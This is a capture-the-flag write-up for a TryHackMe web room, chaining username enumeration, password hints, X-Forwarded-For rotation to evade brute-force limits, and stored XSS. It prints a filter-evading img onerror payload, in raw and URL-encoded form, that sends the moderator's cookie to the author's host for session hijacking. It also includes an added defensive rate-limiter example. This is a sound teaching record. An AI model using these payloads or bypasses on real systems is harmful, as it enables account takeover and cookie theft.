Introduction
Farewell — Premium Room is a web-based Capture The Flag (CTF) challenge on TryHackMe that demonstrates how multiple minor web vulnerabilities can be chained together to achieve full administrative compromise. The challenge involves enumerating valid users, abusing weak password hints, bypassing brute-force protections using client-controlled headers, and exploiting stored HTML/XSS injection within a moderation workflow. This write-up documents the complete attack path from initial enumeration to session hijacking and privilege escalation, highlighting common real-world web security misconfigurations and attacker techniques.
CTF Write-up
Enumeration — Login Page

On the login page, three potential usernames are disclosed:
- adam
- deliver11
- nora
These users appear to be valid accounts, making the login endpoint a good candidate for brute-force or logic-based attacks.
Password Hint Analysis
Viewing the response to the login request in Caido shows that it includes a password hint.
User: adam

Submitting adam as both username and password returns the following hint:
"favorite pet + 2"
I generated a wordlist of common pet names and appended `2` to each entry. However, none of the combinations worked for this user.
User: nora
Password hint:
"lucky number 789"
This hint is too vague to reliably brute force without additional context, so I moved on.
User: deliver11

Password hint:
"Capital of Japan followed by 4 digits"
The capital of Japan is Tokyo, so the password format is:
Tokyo0000 → Tokyo9999
This makes the account ideal for a targeted brute-force attack.
Brute Forcing deliver11
I configured a brute-force attack using:
- Password base: Tokyo
- Payload: 4-digit numeric suffix (0000–9999)

However, all attempts returned HTTP 403 Forbidden, indicating a firewall or rate-limiting mechanism.

Firewall Bypass — X-Forwarded-For
To bypass the restriction, I added the following header:
X-Forwarded-For: 127.0.0.X
The X-Forwarded-For (XFF) header is a standard HTTP header used to identify the originating IP address of a client connecting to a web server through a proxy server or load balancer.
I varied only the last octet of the IP address. Although these are not valid IPs, the application only checks that the value changes between requests, not that it is a legitimate client address, which is sufficient to bypass the firewall.
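The root cause here is that the rate limiter keys on a client-supplied header. As an added example (not code from the challenge or the write-up), the following rate limiter only honours `X-Forwarded-For` when the request arrives from a configured trusted proxy, rejects malformed values, and otherwise keys on the real peer address, so varying the header no longer resets the counter. `TRUSTED_PROXIES`, `MAX_ATTEMPTS` and `LoginLimiter` are names assumed for this demo.

```python
# Added example, not part of the original write-up. Assumed names: TRUSTED_PROXIES,
# MAX_ATTEMPTS, client_ip, LoginLimiter. Addresses are constructed sample values.
import ipaddress
from collections import defaultdict

TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}  # our own load balancer (constructed)
MAX_ATTEMPTS = 5  # failed logins allowed per client before blocking


def client_ip(peer_addr: str, headers: dict) -> str:
    """Resolve the address to rate-limit on.

    X-Forwarded-For is attacker-controlled unless the immediate peer is a proxy
    we operate, so it is ignored otherwise. A value that does not parse as an
    IP is also rejected rather than being treated as a fresh "client".
    """
    peer = ipaddress.ip_address(peer_addr)
    if peer not in TRUSTED_PROXIES:
        return str(peer)
    xff = headers.get("X-Forwarded-For", "")
    # The rightmost hop is the one our proxy appended; earlier hops are untrusted.
    candidate = xff.split(",")[-1].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return str(peer)


class LoginLimiter:
    """Counts failed logins per resolved client address and blocks at MAX_ATTEMPTS."""

    def __init__(self) -> None:
        self.failures = defaultdict(int)

    def attempt(self, peer_addr: str, headers: dict, password_ok: bool) -> int:
        """Return an HTTP-style status: 200 success, 401 bad password, 403 blocked."""
        key = client_ip(peer_addr, headers)
        if self.failures[key] >= MAX_ATTEMPTS:
            return 403
        if password_ok:
            self.failures[key] = 0
            return 200
        self.failures[key] += 1
        return 401
```

With this keying, a client at one real address that rotates `127.0.0.X` in the header still hits the 403 after five failures, while a genuine proxy's rightmost hop is used as the client identity.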

Successful Login
After re-running the brute-force attack with the modified header, the server response changed at payload 1011.

Upon closer inspection:
- Valid password: Tokyo1010
- Authentication succeeded despite the malformed IP.
I logged in as deliver11.
Post-Login Enumeration
After logging in, I noticed:
- A messaging system
- Messages marked as "Approved"
- A user role that appears to be moderated
This strongly suggests a stored XSS opportunity, where a moderator/admin views submitted messages.

Testing for XSS
NOTE: The moderator bot can occasionally fail due to previous payloads; restarting the machine may be necessary.
Initial tests showed that <script> tags are blocked:
<Script>console.log(1)</Script> returned a 403 status code
So I switched to HTML-based injection.
HTML Injection via <iframe>
Payload used:
<iframe src='http://192.168.183.230' />
This successfully triggered a request to my Kali machine, confirming that HTML injection is allowed and executed in the moderator's browser.

Attempting JavaScript Execution
I tried triggering JavaScript using an `onerror` event:
<iframe src='http://192.168.183.230/something' onerror='fetch("http://192.168.183.230/fetch")' />
The request to '/something' returned 403, indicating that keywords like 'fetch' are blocked by a filter.

Filter Bypass — `eval()` + Event Handler
To bypass keyword filtering:
- Avoided `<script>`
- Avoided direct use of `fetch`
- Used **string concatenation**
- Used an **`img` tag with `onerror`**
Final Payload (Original):
<img src='x' OnErRor=eval('fet'+'ch("http://192.168.183.230/"+docum'+'ent.coo'+'kie)') />
URL-Encoded Payload:
%3Cimg%20src%3D'x'%20OnErRor%3Deval('fet'%2B'ch("http%3A%2F%2F192.168.183.230%2F"%2Bdocum'%2B'ent.coo'%2B'kie)')%20%2F%3E
Cookie Theft
After submitting the payload, my Python HTTP server received a request containing the moderator's session cookie.

Ignore the other requests; they were generated while testing payloads.
Privilege Escalation Steps:
- Copy the stolen cookie
- Replace your session cookie in the browser
- Navigate to: /admin.php

This page is used for moderation and contains the admin flag.
Conclusion
Vulnerabilities Exploited
- Username enumeration
- Weak password hints
- Inadequate brute-force protection
- Improper trust in X-Forwarded-For
- Stored HTML injection
- Insufficient XSS filtering
- Session hijacking via XSS
This chain demonstrates how small misconfigurations, when combined, can lead to full administrative compromise.